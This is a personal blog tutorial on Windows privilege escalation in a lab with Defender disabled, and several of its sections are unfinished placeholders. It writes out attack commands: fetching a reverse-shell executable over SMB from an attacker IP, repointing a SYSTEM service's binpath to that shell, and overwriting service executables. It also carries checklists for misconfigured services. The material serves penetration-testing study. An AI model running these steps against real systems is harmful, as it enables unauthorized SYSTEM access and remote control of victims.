<!DOCTYPE HTML>
<html>
<head>
  <meta charset="utf-8">
  <meta http-equiv="pragma" content="no-cache">
  <meta http-equiv="cache-control" content="no-cache">
  <meta http-equiv="expires" content="0">
  
  <title>Privilege Escalation Blueprint | v1pa0z Blog</title>
  <meta name="author" content="mag">
  
  <meta name="description" content="my personal blog">
  
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  <meta property="og:title" content="Privilege Escalation Blueprint"/>
  <meta property="og:site_name" content="v1pa0z Blog"/>

  
    <meta property="og:image" content=""/>
  

  
    <link rel="alternative" href="/atom.xml" title="v1pa0z Blog" type="application/atom+xml">
  
  
    <link href="/favicon.png" rel="icon">
  
  
  <link rel="stylesheet" href="/css/bootstrap.min.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/font-awesome.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/style.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/responsive.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/highlight.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/prism.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/google-fonts.css" media="screen" type="text/css">
  <!--[if lt IE 9]><script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->

  <script src="/js/jquery-2.0.3.min.js"></script>

  <!-- analytics -->
  
  <!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-70812759-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-70812759-1');
</script>






<meta name="generator" content="Hexo 7.3.0"></head>

 <body>  
  <nav id="main-nav" class="navbar navbar-inverse navbar-fixed-top" role="navigation">
    <div class="container">
      <button type="button" class="navbar-header navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
		<span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
	  <a class="navbar-brand" href="/">v1pa0z Blog</a>
      <div class="collapse navbar-collapse nav-menu">
		<ul class="nav navbar-nav">
		  
		  <li>
			<a href="/archives" title="All the articles.">
			  <i class="fa fa-archive"></i>Archives
			</a>
		  </li>
		  
		  <li>
			<a href="/categories" title="All the categories.">
			  <i class="fa fa-folder"></i>Categories
			</a>
		  </li>
		  
		  <li>
			<a href="/tags" title="All the tags.">
			  <i class="fa fa-tags"></i>Tags
			</a>
		  </li>
		  
		  <li>
			<a href="/about" title="About me.">
			  <i class="fa fa-user"></i>About
			</a>
		  </li>
		  
		</ul>
      </div>
    </div> <!-- container -->
</nav>
<div class="clearfix"></div>

  <div class="container">
  	<div class="content">
    	 


	
		<div class="page-header">
			<h1> Privilege Escalation Blueprint</h1>
		</div>
	



<div class="row post">
	<!-- cols -->
	
	<div id="top_meta"></div>
	<div class="col-md-9">
	

	<!-- content -->
	<div class="mypage">		
	  		

	  <p><img src="/../images/priv-esc-win/image.png" alt="h1"></p>
<hr>
<h1 id="Introduction"><a href="#Introduction" class="headerlink" title="Introduction"></a>Introduction</h1><p>In this guide, I’ll walk you through essential Windows privilege escalation techniques, covering various methods from kernel exploits to application misconfigurations. We’ll start by setting up our lab environment and tools, then dive into specific methods for escalation, I’ll also include a list of checks for each section.</p>
 <span id="more"></span>
<hr>
<h2 id="Table-of-Contents"><a href="#Table-of-Contents" class="headerlink" title="Table of Contents"></a>Table of Contents</h2><ul>
<li><p><a href="#introduction">Introduction</a></p>
</li>
<li><p><a href="#lab-setup-and-tools">Lab Setup and Tools</a></p>
</li>
<li><p><a href="#privilege-escalation-tools">Privilege Escalation Tools</a></p>
</li>
<li><p><a href="#kernel-and-service-exploits">Kernel Exploits</a></p>
</li>
<li><p><a href="#kernel-and-service-exploits">Service Exploits</a></p>
</li>
<li><p><a href="#registry">Registry</a></p>
</li>
<li><p><a href="#passwords">Passwords</a></p>
</li>
<li><p><a href="#scheduled-tasks">Scheduled Tasks</a></p>
</li>
<li><p><a href="#insecure-gui-applications">Insecure GUI Applications</a></p>
</li>
<li><p><a href="#installed-applications">Installed Applications</a></p>
</li>
<li><p><a href="#port-forwarding">Port Forwarding</a></p>
</li>
<li><p><a href="#startup-applications">Startup Applications</a></p>
</li>
<li><p><a href="#conclusion">Conclusion</a></p>
<hr>
</li>
</ul>
<h2 id="Lab-Setup-and-Tools"><a href="#Lab-Setup-and-Tools" class="headerlink" title="Lab Setup and Tools"></a>Lab Setup and Tools</h2><hr>
<p>For this guide, I’m using a virtual environment with Kali Linux as the attack machine and Windows 10 as the target machine. environment is configured with default security settings and  Windows defender was disabled to focus on learning the techniques. </p>
<p>List of tools used:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">accesschk.exe          juicypotato.zip  Procmon64.exe  SharpUp.exe</span><br><span class="line">CreateShortcut.vbs     plink.exe        PsExec64.exe   winPEASany.exe</span><br><span class="line">cve-2018-8120-x64.exe  potato.exe       Seatbelt.exe</span><br><span class="line">JuicyPotato.exe        PowerUp.ps1      setup.bat</span><br></pre></td></tr></table></figure>

<p>Transfering tools over to the victim:<br>in order to move the files to our target we will use SMB.</p>
<p>enable smb on windows so we can transfer the tools<br><img src="/../images/priv-esc-win/smve.png" alt="alt text"></p>
<p>start  SMB server on Kali:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python /usr/share/doc/python3-impacket/examples/smbserver.py tools .</span><br></pre></td></tr></table></figure>

<p>start a reverse shell on Windows instead of having to use the gui</p>
<figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cp C:/Users/vboxuser/Desktop/</span><br><span class="line">\\<span class="number">192</span>.<span class="number">168</span>.<span class="number">5</span>.<span class="number">4</span>\tools\reverse.exe</span><br></pre></td></tr></table></figure>
<hr>
<h2 id="Windows-Access-Control-and-Privileges"><a href="#Windows-Access-Control-and-Privileges" class="headerlink" title="Windows Access Control and Privileges"></a>Windows Access Control and Privileges</h2><hr>
<h3 id="User-Accounts"><a href="#User-Accounts" class="headerlink" title="User Accounts"></a>User Accounts</h3><p>Think of a user account as a collection of settings &#x2F; preferences<br>bound to a unique identity.<br>The local “Administrator” account is created by default at<br>installation.</p>
<h3 id="SERVICE-ACCOUNTS"><a href="#SERVICE-ACCOUNTS" class="headerlink" title="SERVICE ACCOUNTS"></a>SERVICE ACCOUNTS</h3><p>Service accounts are (somewhat obviously) used to run services<br>in Windows.<br>Service accounts cannot be used to sign into a Windows system.<br>&#x3D;&#x3D;The SYSTEM account is a default service account which has the&#x3D;&#x3D;<br>&#x3D;&#x3D;highest privileges&#x3D;&#x3D; of any local account in Windows.<br>Other default service accounts include NETWORK SERVICE and<br>LOCAL SERVICE.</p>
<h3 id="Groups"><a href="#Groups" class="headerlink" title="Groups"></a>Groups</h3><p>Pseudo groups (e.g. “Authenticated Users”) have a dynamic list of<br>members which changes based on certain interactions.</p>
<h3 id="Resources"><a href="#Resources" class="headerlink" title="Resources"></a>Resources</h3><p>In Windows, there are multiple types of resource (also known as objects):<br>• Files &#x2F; Directories<br>• Registry Entries<br>• Services</p>
<p>Whether a user or a group has permission to perform a certain action<br>on a resource depends on that resource’s access control list (ACL).</p>
<hr>
<h3 id="ACLs-ACEs"><a href="#ACLs-ACEs" class="headerlink" title="ACLs &amp; ACEs"></a>ACLs &amp; ACEs</h3><hr>
<p><img src="/../images/priv-esc-win/1.png" alt="alt text"></p>
<p>Permissions to access a certain resource in Windows are controlled by the access control list (ACL) for that resource. Each ACL is made up of zero or more access control entries (ACEs).<br>Each ACE defines the relationship between a principal (e.g. a<br>user, group) and a certain access right.</p>
<hr>
<h2 id="Kernel-Exploits"><a href="#Kernel-Exploits" class="headerlink" title="Kernel Exploits"></a>Kernel Exploits</h2><hr>
<p>Kernel exploits allow you to escalate privileges by taking advantage of vulnerabilities in the system’s core processes or services. This section explores common kernel and service vulnerabilities and methods to exploit them.<br>The kernel has complete control over the operating system. Think of it as a layer between application software and the actual computer hardware Exploiting a kernel vulnerability can result in execution as the <code>SYSTEM</code> user.</p>
<p>Finding and using kernel exploits is usually a simple process:</p>
<ol>
<li>Enumerate Windows version &#x2F; patch level <code>(systeminfo)</code>.</li>
<li>Find matching exploits (Google, ExploitDB, GitHub)MS.</li>
<li>Compile and run</li>
</ol>
<hr>
<h2 id="Enumerating-the-environment"><a href="#Enumerating-the-environment" class="headerlink" title="Enumerating the environment"></a>Enumerating the environment</h2><hr>
<ul>
<li>Windows Exploit Suggester:</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git clone https://github.com/bitsadmin/wesng</span><br></pre></td></tr></table></figure>
<p>you need to feed it the systeminfo output</p>
<p>run this from windows terminal: </p>
<figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">systeminfo &gt; sysinfo.txt</span><br></pre></td></tr></table></figure>

<p>run the Windows exploit suggester:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"> &gt; wes sysinfo.txt -i &#x27;Elevation</span><br><span class="line">of Privilege&#x27; --exploits-only | less</span><br></pre></td></tr></table></figure>

<p><img src="/../images/priv-esc-win/wes.png" alt="alt text"></p>
<p>so now that we hopefully enumerated the kernal version using wes lets look for Precompiled Kernel Exploits:<br><a target="_blank" rel="noopener" href="https://github.com/SecWiki/windows-kernel-exploits">https://github.com/SecWiki/windows-kernel-exploits</a><br>Unfourtently for me i wasn’t able to get any exploits as the machine i was testing was fully patched. if you found though, you can look up the exploit and try it for priv esc.</p>
<hr>
<h2 id="Services"><a href="#Services" class="headerlink" title="Services"></a><strong>Services</strong></h2><hr>
<p>services act as background programs, executing some regular tasks. if services are misconfigured and are running with system privileges, you can exploit them to run commands with system privileges too. Each service has an ACL which defines service-specific Permissions.<br>Some permissions are not useful for our intetions (e.g. <code>SERVICE_QUERY_CONFIG</code>,<br><code>SERVICE_QUERY_STATUS</code>).<br>Some may be useful (e.g. <code>SERVICE_STOP</code>, <code>SERVICE_START</code>).<br>Some are dangerous (e.g. <code>SERVICE_CHANGE_CONFIG</code>,<code>SERVICE_ALL_ACCESS</code>)<br>Common Service Misconfigurations:</p>
<ul>
<li>Insecure properties</li>
<li>unquoted Service Path</li>
<li>Weak Registry Permissions</li>
<li>Insecure Service executables</li>
<li>DLL hijacking</li>
</ul>
<p><strong>Insecure Service permissions</strong></p>
<ul>
<li>if a user has permission to change the configuration of a service which runs with system privileges, we can change the executable the services uses to one of our own.</li>
<li>you need to be able to start&#x2F;stop the service.</li>
</ul>
<p><img src="/../images/priv-esc-win/winpeas-service.png" alt="alt text"></p>
<p>Let’s find out more details about the service<br>querying for service info:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&gt; sc qc daclsvc</span><br></pre></td></tr></table></figure>

<p>![[HTB&#x2F;CPTS&#x2F;offensive security&#x2F;Screenshots&#x2F;images&#x2F;images 1&#x2F;Pasted image 20240811150127.png]]</p>
<p><code>START_TYPE: DEMAD_START</code> means this server starts manually also, the service runs with <strong>system permissions</strong>.<br>querying for service status</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sc query daclsvc</span><br></pre></td></tr></table></figure>
<p>![[HTB&#x2F;CPTS&#x2F;offensive security&#x2F;Screenshots&#x2F;images&#x2F;images 1&#x2F;Pasted image 20240811150657.png]]<br><strong>Changing  configuration</strong>:<br>so now that we we know that the service config is modifiable, we’re able to tamper with the config to set the binary path of the service to our own executable <code>reverseshell.exe</code> and start the service.<br>Tools is located at <code>C:\Users\user\Desktop\tools</code></p>
<figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sc config daclsvc binpath= &quot;\&quot;C:\Users\user\Desktop\tools\reverse.exe\&quot;&quot;</span><br></pre></td></tr></table></figure>
<p>Confirming the new config.<br>![[HTB&#x2F;CPTS&#x2F;offensive security&#x2F;Screenshots&#x2F;images&#x2F;images 1&#x2F;Pasted image 20240811151453.png]]<br>Now you can start a <code>nc</code> listener and <code>net start daclsvc</code> to get a shell using this technique .</p>
<p>*<strong>Modifiable services</strong><br>after running <code>winPEAS.exe queit serviceinfo</code> to enumerate services information<br>we can find that the<code>daclsvc</code>  properties can be modified.<br><strong>Accesschk flags</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Services:    -uwqcv user &lt;svc-name&gt;</span><br><span class="line">Files:       -quvw</span><br><span class="line">Directories: -uwdq</span><br><span class="line">Registries:  -uvwqk</span><br></pre></td></tr></table></figure>

<hr>
<h4 id="Service-permission-Checklist"><a href="#Service-permission-Checklist" class="headerlink" title="Service permission Checklist:"></a>Service permission Checklist:</h4><hr>
<p>**Checks for insecure service permission:</p>
<ul>
<li><input disabled="" type="checkbox"> you ran <strong>Winpeas</strong> and it highlighted  that you can modify a service.</li>
<li><input disabled="" type="checkbox"> You are able to interact with services (Eg. Query config)</li>
<li><input disabled="" type="checkbox"> You confirmed your current user’s permissions to service with **accescheck</li>
</ul>
<figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">accesschk /accepteula -uwcqv &lt;loggedin-user&gt; &lt;svc-name&gt;</span><br></pre></td></tr></table></figure>
<p>The follow checks are also related to accesschk:</p>
<ul>
<li><input disabled="" type="checkbox"> you can modify configuration of a service <code>SERVICE_CHANGE_CONFIG</code></li>
<li><input disabled="" type="checkbox"> You can start the service <code>SERVICE_START</code></li>
<li><input disabled="" type="checkbox"> The service is run with the permission of system or higher privilege user <code>SERVICE_START_NAME</code> Attributes</li>
</ul>
<hr>
<p><strong>Checks for unquoted Service Path</strong>:</p>
<ul>
<li><input disabled="" type="checkbox"> you ran <strong>Winpeas</strong> and it found that a service had unquoted path.</li>
<li><input disabled="" type="checkbox"> You ran accesschk  <code>-ucqv</code> to see if you have <code>SERVICE_START</code> permission.</li>
<li><input disabled="" type="checkbox"> You ran acceschk on each directory in the path to binary  <code>-uwdq  &lt;possible-dir&gt;</code></li>
</ul>
<hr>
<p><strong>Checks for Weak Registry Permissions</strong></p>
<ul>
<li><input disabled="" type="checkbox"> WINPEAS Output</li>
<li><input disabled="" type="checkbox"> Verify registry permission with powershell or acesschk</li>
</ul>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">Get-Acl</span> &lt;REGISTERY<span class="literal">-ENTRY-PATH</span>&gt; | <span class="built_in">Format-List</span></span><br><span class="line"></span><br><span class="line">accesschk.exe /accepteula <span class="literal">-uvwqk</span> &lt;registery path&gt;</span><br></pre></td></tr></table></figure>
<ul>
<li><input disabled="" type="checkbox"> Check for <code>start/stop </code> permission <code> accesschk /accepteula -ucqv user &lt;svc&gt;</code></li>
<li><input disabled="" type="checkbox"> Query registry info <code>reg query &lt;regPath&gt;</code></li>
<li><input disabled="" type="checkbox"> Override registry values using <code>reg add </code></li>
</ul>
<hr>
<p><strong>Checks for insecure file permissions (Replaceable exe)</strong>:</p>
<ul>
<li><input disabled="" type="checkbox"> WINPEAS Output</li>
<li><input disabled="" type="checkbox"> Access check with <code>-quvw</code> and <code>uvqc</code> on the <code>exe</code> file</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">copy /Y &lt;pathtoshell&gt; &quot;&lt;path-to-exe&gt;&quot;</span><br></pre></td></tr></table></figure>

<hr>
<h2 id="Passwords"><a href="#Passwords" class="headerlink" title="Passwords"></a>Passwords</h2><hr>
<p>In this section, we look at methods to locate and exploit weak or hardcoded passwords on a system. Tools like <code>mimikatz</code> can be particularly useful for this.</p>
<p><strong>![Image Placeholder: Password Extraction]</strong></p>
<hr>
<h2 id="Registry"><a href="#Registry" class="headerlink" title="Registry"></a>Registry</h2><hr>
<p>The Windows Registry stores configuration settings, some of which may be misconfigured in a way that allows privilege escalation. Here’s what to look for in the registry and how to leverage any insecure settings.</p>
<p><strong>![Image Placeholder: Registry Exploitation Steps]</strong></p>
<hr>
<h2 id="Insecure-GUI-Applications"><a href="#Insecure-GUI-Applications" class="headerlink" title="Insecure GUI Applications"></a>Insecure GUI Applications</h2><hr>
<p>GUI applications that run with elevated privileges but have insecure settings can be exploited to execute arbitrary code. This section covers how to identify and take advantage of these applications.</p>
<p><strong>![Image Placeholder: GUI Application Exploitation]</strong></p>
<hr>
<h2 id="Scheduled-Tasks"><a href="#Scheduled-Tasks" class="headerlink" title="Scheduled Tasks"></a>Scheduled Tasks</h2><hr>
<p>Misconfigured scheduled tasks may allow an attacker to replace executables or scripts with their own. This section explains how to find and exploit such tasks for privilege escalation.</p>
<p><strong>![Image Placeholder: Scheduled Task Exploitation Steps]</strong></p>
<hr>
<h2 id="Installed-Applications"><a href="#Installed-Applications" class="headerlink" title="Installed Applications"></a>Installed Applications</h2><hr>
<p>Improperly configured installed applications can present opportunities for privilege escalation. Here, we’ll cover common misconfigurations in applications that can be exploited.</p>
<p><strong>![Image Placeholder: Application Misconfiguration Exploitation]</strong></p>
<hr>
<h2 id="Port-Forwarding"><a href="#Port-Forwarding" class="headerlink" title="Port Forwarding"></a>Port Forwarding</h2><hr>
<p>If network restrictions are blocking your path, port forwarding can help bypass them. Learn how to use port forwarding to create new attack vectors in restricted environments.</p>
<p><strong>![Image Placeholder: Port Forwarding Example]</strong></p>
<hr>
<h2 id="Startup-Applications"><a href="#Startup-Applications" class="headerlink" title="Startup Applications"></a>Startup Applications</h2><hr>
<p>Applications set to run at startup, especially those with elevated privileges, may be vulnerable to exploitation. Here’s how to check for these applications and leverage any vulnerabilities.</p>
<p><strong>![Image Placeholder: Startup Application Exploitation]</strong></p>
<hr>
<h2 id="Conclusion"><a href="#Conclusion" class="headerlink" title="Conclusion"></a>Conclusion</h2><hr>
<p>Privilege escalation is a critical skill in penetration testing, and mastering these techniques gives you powerful insight into system security. This guide covers various practical methods, from kernel exploits to startup applications, ensuring you have a solid toolkit for real-world scenarios. Always remember to test responsibly!</p>

	  <div class="article-footer-copyright">

</div>

	</div>

	
	
	<div>
  	<center>

	<div class="pagination">

    
    
    <a href="/2025/01/22/HTB-SolarLab copy/" type="button" class="btn btn-default"><i
                class="fa fa-arrow-circle-o-left"></i> Prev</a>
    

    <a href="/" type="button" class="btn btn-default"><i class="fa fa-home"></i>Home</a>
    
    <a href="/2024/09/22/HTB-SolarLab/" type="button" class="btn btn-default ">Next<i
                class="fa fa-arrow-circle-o-right"></i></a>
    

    
</div>


    </center>
	</div>
	
	<!-- comment -->
	<!--
<section id="comment">
    <h2 class="title">Comments</h2>

    
</section>

-->
	
	
	
	</div> <!-- col-md-9/col-md-12 -->


	
	<div id="side_meta">
		<div class="col-md-3" id="post_meta"> 

	<!-- date -->
	
	<div class="meta-widget">
	<i class="fa fa-clock-o"></i>
	2024-11-03 
	</div>
	

	<!-- categories -->
    

	<!-- tags -->
	
	<div class="meta-widget">
	<a data-toggle="collapse" data-target="#tags"><i class="fa fa-tags"></i></a>		  
    <ul id="tags" class="tag_box list-unstyled collapse in">	  
	    
  <li><a href="/tags/Windows/">Windows<span>1</span></a></li> <li><a href="/tags/privesc/">privesc<span>1</span></a></li>
    </ul>
	</div>
		

	<!-- toc -->
	<div class="meta-widget">
	
	</div>
	
    <hr>
	
</div><!-- col-md-3 -->

		

	</div>
	
		

</div><!-- row -->

<!--
 -->



	</div>
  </div>
  <div class="container-narrow">
  <footer> <p>
  
  &copy; 2025 mag's Blog
  
</p>
 </footer>
</div> <!-- container-narrow -->
  


  
<a id="gotop" href="#">   
  <span>⬆︎TOP</span>
</a>

<script src="/js/jquery.imagesloaded.min.js"></script>
<script src="/js/gallery.js"></script>
<script src="/js/bootstrap.min.js"></script>
<script src="/js/main.js"></script>
<script src="/js/search.js"></script> 


<link rel="stylesheet" href="/fancybox/jquery.fancybox.css" media="screen" type="text/css">
<script src="/fancybox/jquery.fancybox.pack.js"></script>
<script type="text/javascript">
(function($){
  $('.fancybox').fancybox();
})(jQuery);
</script>



   <script type="text/javascript">      
     var search_path = "search.xml";
	 if (search_path.length == 0) {
	 	search_path = "search.xml";
	 }
	 var path = "/" + search_path;
     searchFunc(path, 'local-search-input', 'local-search-result');
   </script>

</body>
   </html>
